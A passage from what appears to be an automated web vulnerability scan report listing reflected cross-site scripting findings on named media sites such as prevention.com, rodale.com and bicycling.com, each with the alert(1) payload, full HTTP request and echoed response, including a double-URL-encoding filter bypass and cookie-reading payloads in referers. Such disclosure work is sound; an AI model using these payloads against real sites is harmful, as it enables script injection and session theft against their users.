User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 587

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q078a58ad26175eba8c3cc45a5246eb076e00e84e
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Thu, 10 Mar 2011 16:41:14 GMT
Server:
Content-Length: 4106

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
........eAQ~~,AAAAABmSxQc~,497DR8qMzMu1cSa2IHyZJwozOiERaBVX.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bfz..w ....gvideoPlayerabac2<script>alert(1)</script>71864f41a7.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

2.13. http://ds.addthis.com/red/psi/sites/www.prevention.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.prevention.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a3993<script>alert(1)</script>e17c06a897c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.prevention.com/p.json?callback=_ate.ad.hpra3993<script>alert(1)</script>e17c06a897c&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.prevention.com%2Fcda%2Fhomepage.do%3Fcm_sp%3DNetwork%2520Banner-_-PV-_-Rodale.com&y8zqvf HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh33.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299599890.60|1299599890.1FE|1297806627.66; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 407
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 10 Mar 2011 16:42:07 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 16:42:07 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299775327.1FE|1299775327.60|1297806627.66; Domain=.addthis.com; Expires=Sat, 09-Mar-2013 02:59:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 10 Mar 2011 16:42:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:42:07 GMT
Connection: close

_ate.ad.hpra3993<script>alert(1)</script>e17c06a897c({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d5af32c71c2e1a5","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.prevent
...[SNIP]...

2.14. http://recipes.rodale.com/homepage.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://recipes.rodale.com
Path:   /homepage.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d0ac'-alert(1)-'ac698ac70ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /homepage.aspx?7d0ac'-alert(1)-'ac698ac70ae=1 HTTP/1.1
Host: recipes.rodale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: URL=http://recipes.rodale.com/Default.aspx; ASP.NET_SessionId=wcjk0ffc5vis5xu3pxtlpyf1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=20
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:44:26 GMT
Last-Modified: Thu, 10 Mar 2011 16:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: URL=http://recipes.rodale.com/homepage.aspx?7d0ac'-alert(1)-'ac698ac70ae=1; path=/; HttpOnly
Date: Thu, 10 Mar 2011 16:44:05 GMT
Content-Length: 124318


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl01_MasterHead"><t
...[SNIP]...
dfpCat= 'recipes';
var cat = dfpCat;
var dfpKeyword = '';
var siteName = 'rodale';
var dfpTile='1';
var tile = dfpTile;
var useCAS = 'N';
var logInLandingPage= 'http://recipes.rodale.com/homepage.aspx?7d0ac'-alert(1)-'ac698ac70ae=1';
var logOutLandingPage= 'http://recipes.rodale.com/homepage.aspx?7d0ac'-alert(1)-'ac698ac70ae=1';
</script>
...[SNIP]...

2.15. http://remedies.rodale.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://remedies.rodale.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8acab%2522%253balert%25281%2529%252f%252f442e2727d3c was submitted in the REST URL parameter 1. This input was echoed as 8acab";alert(1)//442e2727d3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico8acab%2522%253balert%25281%2529%252f%252f442e2727d3c HTTP/1.1
Host: remedies.rodale.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESScb632e7b126b35a7bcfbb3451a86cfd7=2qgeu9pbmt1ukaeaeupr9gjg82; HomeRemedies_Gateway_Cookie=1299775124000; has_js=1; RMDCURURL=http://remedies.rodale.com/; cmTPSet=Y; _chartbeat2=2gjgtv7qcf2o20vh

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 16:45:08 GMT
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:45:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:45:11 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: HomeRemedies_Gateway_Cookie=1299775508000; path=/; domain=remedies.rodale.com
Content-Length: 57090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="utf-8">

<head>
<title>
...[SNIP]...
<script type="text/javascript">
var parentURL = "http://remedies.rodale.com/favicon.ico8acab";alert(1)//442e2727d3c";
var dfpZone = "remedies";
var dfpTopic = "";
var dfpSubTopic = "";
var dfpTile = 1;
var dfpKeyword = "";
var siteName="rodale";
var dfpCat="";
var logInLandingPage = 'http://remedies
...[SNIP]...

2.16. http://sitelife.prevention.com/ver1.0/Summary/SummaryArticlesMostCommented [plckElementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.prevention.com
Path:   /ver1.0/Summary/SummaryArticlesMostCommented

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de07"%3balert(1)//45359c91e1c was submitted in the plckElementId parameter. This input was echoed as 1de07";alert(1)//45359c91e1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryArticlesMostCommented?plckElementId=Summary_Container1de07"%3balert(1)//45359c91e1c&plckCount=5&plckNoCache=1299795821407&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.prevention.com
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1842843424-1299775204149; PVNCURURL=http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows

Response

HTTP/1.1 200 OK
Set-Cookie: preventionprod=R3213878906; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 3758
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: preventionprod3l3pluckcom
Set-Cookie: ASP.NET_SessionId=o3bmjoejdw0utrmg4ob5ewu1; path=/; HttpOnly
Set-Cookie: SiteLifeHost=preventionprod3l3pluckcom; domain=prevention.com; path=/
Set-Cookie: anonId=96d1dad1-c7c6-40a8-804b-69792fc4b569; domain=prevention.com; expires=Fri, 09-Mar-2012 22:23:25 GMT; path=/
Date: Thu, 10 Mar 2011 22:23:25 GMT

document.domain = "prevention.com";

gSiteLife.InnerHtmlWrite("Summary_Container1de07";alert(1)//45359c91e1c", "<!--Article summary--><div class=\"Summary_Container\">     <div c
...[SNIP]...

2.17. http://sitelife.prevention.com/ver1.0/Summary/SummaryArticlesMostRecommended [plckElementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.prevention.com
Path:   /ver1.0/Summary/SummaryArticlesMostRecommended

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4262"%3balert(1)//bd0a4fd4022 was submitted in the plckElementId parameter. This input was echoed as e4262";alert(1)//bd0a4fd4022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryArticlesMostRecommended?plckElementId=Summary_Container1e4262"%3balert(1)//bd0a4fd4022&plckCount=5&plckNoCache=1299795821408&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.prevention.com
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1842843424-1299775204149; PVNCURURL=http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows

Response

HTTP/1.1 200 OK
Set-Cookie: preventionprod=R3213878906; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 3619
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: preventionprod3l3pluckcom
Set-Cookie: ASP.NET_SessionId=v000esivmb5gi0au5nccfb3k; path=/; HttpOnly
Set-Cookie: SiteLifeHost=preventionprod3l3pluckcom; domain=prevention.com; path=/
Set-Cookie: anonId=f593341a-07fb-46c7-9fe0-ff4627f59bc0; domain=prevention.com; expires=Fri, 09-Mar-2012 22:23:25 GMT; path=/
Date: Thu, 10 Mar 2011 22:23:25 GMT

document.domain = "prevention.com";

gSiteLife.InnerHtmlWrite("Summary_Container1e4262";alert(1)//bd0a4fd4022", "<!--Article summary--><div class=\"Summary_Container\">     <div
...[SNIP]...

2.18. http://sitelife.prevention.com/ver1.0/Summary/SummaryBlogsRecent [plckElementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.prevention.com
Path:   /ver1.0/Summary/SummaryBlogsRecent

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fef2"%3balert(1)//1d2ed9a1446 was submitted in the plckElementId parameter. This input was echoed as 6fef2";alert(1)//1d2ed9a1446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryBlogsRecent?plckElementId=Summary_Container26fef2"%3balert(1)//1d2ed9a1446&plckCount=3&plckNoCache=1299795821408&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.prevention.com
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1842843424-1299775204149; PVNCURURL=http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows

Response

HTTP/1.1 200 OK
Set-Cookie: preventionprod=R3213878906; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 1571
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: preventionprod3l3pluckcom
Set-Cookie: ASP.NET_SessionId=jpd031yxfaeoz22wig5osa45; path=/; HttpOnly
Set-Cookie: SiteLifeHost=preventionprod3l3pluckcom; domain=prevention.com; path=/
Set-Cookie: anonId=acea500a-eb36-4c0c-9c0b-f0e4e2babd5f; domain=prevention.com; expires=Fri, 09-Mar-2012 22:23:24 GMT; path=/
Date: Thu, 10 Mar 2011 22:23:24 GMT

document.domain = "prevention.com";

gSiteLife.InnerHtmlWrite("Summary_Container26fef2";alert(1)//1d2ed9a1446", "<!--Blog summary--><div class=\"Summary_Container\"> <table class=\"Summary_BlogTa
...[SNIP]...

2.19. http://sitelife.prevention.com/ver1.0/Summary/SummaryBlogsRecentPosts [plckElementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.prevention.com
Path:   /ver1.0/Summary/SummaryBlogsRecentPosts

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de170"%3balert(1)//3c37359584b was submitted in the plckElementId parameter. This input was echoed as de170";alert(1)//3c37359584b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryBlogsRecentPosts?plckElementId=Summary_Containerde170"%3balert(1)//3c37359584b&plckCount=3&plckTagFilter=UserTier:Featured&plckNoCache=1299795839779&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.prevention.com
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1842843424-1299775204149; preventionprod=R3213878906; ASP.NET_SessionId=yenypbvdewyi2j452irbbh45; SiteLifeHost=preventionprod3l3pluckcom; anonId=69c065c5-d7da-4e8e-bf8d-b0a9856c0902; PVNCURURL=http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown

Response

HTTP/1.1 200 OK
Set-Cookie: preventionprod=R3213878906; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4882
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: preventionprod3l3pluckcom
Set-Cookie: SiteLifeHost=preventionprod3l3pluckcom; domain=prevention.com; path=/
Date: Thu, 10 Mar 2011 22:23:55 GMT

document.domain = "prevention.com";

gSiteLife.InnerHtmlWrite("Summary_Containerde170";alert(1)//3c37359584b", "<!--Post Summary--><div class=\"Summary_Container\"> <table class=\"Summary_BlogTab
...[SNIP]...

2.20. http://sitelife.runnersworld.com/ver1.0/Summary/SummaryBlogsRecentPosts [plckElementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.runnersworld.com
Path:   /ver1.0/Summary/SummaryBlogsRecentPosts

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 659cb"%3balert(1)//605113aabff was submitted in the plckElementId parameter. This input was echoed as 659cb";alert(1)//605113aabff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryBlogsRecentPosts?plckElementId=Summary_Container659cb"%3balert(1)//605113aabff&plckCount=3&plckTagFilter=UserTier:Trusted&plckNoCache=1299775226702&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.runnersworld.com
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: plckARPTrrunworldprod=R3615854285; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm238l3pluckcom
Set-Cookie: SiteLifeHost=l3vm238l3pluckcom; domain=runnersworld.com; path=/
Set-Cookie: anonId=56e05ab0-5adc-4413-8795-093322ab0307; domain=runnersworld.com; expires=Fri, 09-Mar-2012 16:43:42 GMT; path=/
Date: Thu, 10 Mar 2011 16:43:41 GMT
Content-Length: 4586

document.domain = "runnersworld.com";

gSiteLife.InnerHtmlWrite("Summary_Container659cb";alert(1)//605113aabff", "<!--Post Summary--><div class=\"Summary_Container\"> <table class=\"Summary_BlogT
...[SNIP]...

2.21. http://video.bicycling.com/decor/javascript/elements.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/javascript/elements.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef70c"><script>alert(1)</script>a5fc3b044f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decoref70c"><script>alert(1)</script>a5fc3b044f5/javascript/elements.js?3 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=221961b751ef8fd98f0c48221ccd6bbf; path=/; expires=Fri, 11-Mar-2011 16:41:20 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48599
Date: Thu, 10 Mar 2011 16:41:20 GMT
X-Varnish: 908941127
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decoref70c"><script>alert(1)</script>a5fc3b044f5/javascript/elements.js%0AServer: video.bicycling.com%0APath: /decoref70c">
...[SNIP]...

2.22. http://video.bicycling.com/decor/javascript/magnify_pipeline.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/javascript/magnify_pipeline.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 996bb"><script>alert(1)</script>8dae519f5a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decor996bb"><script>alert(1)</script>8dae519f5a0/javascript/magnify_pipeline.js?v1.2 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=1b7bca0cd5f2709c54af5045f9c2daf0; path=/; expires=Fri, 11-Mar-2011 16:41:22 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48630
Date: Thu, 10 Mar 2011 16:41:22 GMT
X-Varnish: 908941357
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decor996bb"><script>alert(1)</script>8dae519f5a0/javascript/magnify_pipeline.js%0AServer: video.bicycling.com%0APath: /decor996bb">
...[SNIP]...

2.23. http://video.bicycling.com/decor/javascript/magnify_stats.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/javascript/magnify_stats.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b2d"><script>alert(1)</script>e97edfb21a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decord5b2d"><script>alert(1)</script>e97edfb21a1/javascript/magnify_stats.js?v1.3 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Set-Cookie: mvp_session=d614ec21bddf6a07496656767309fb65; path=/; expires=Fri, 11-Mar-2011 16:41:22 GMT
Content-Type: Text/HTML
X-Cache: MISS from video.bicycling.com
X-Magnify-Cache-Eligible: YES
X-Magnify-Cached: No
Content-Length: 48619
Date: Thu, 10 Mar 2011 16:41:22 GMT
X-Varnish: 908941360
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
y=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://video.bicycling.com/decord5b2d"><script>alert(1)</script>e97edfb21a1/javascript/magnify_stats.js%0AServer: video.bicycling.com%0APath: /decord5b2d">
...[SNIP]...

2.24. http://video.bicycling.com/decor/live/transparent.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.bicycling.com
Path:   /decor/live/transparent.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a12b"><script>alert(1)</script>8c0848d39f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /decor7a12b"><script>alert(1)</script>8c0848d39f9/live/transparent.gif?keepalive=1299775216667 HTTP/1.1
Host: video.bicycling.com
Proxy-Connection: keep-alive
Referer: http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2?referrer=http%3A%2F%2Fwww.bicycling.com%2Fsites%2Fdefault%2Ffiles%2Fiframe_filter%2F268f584d3b19887c40f44a57f48e6677.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-739820718-1299775174294; mvp_session=f899d191af7c22c1f7a0d0e1386c14d2

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
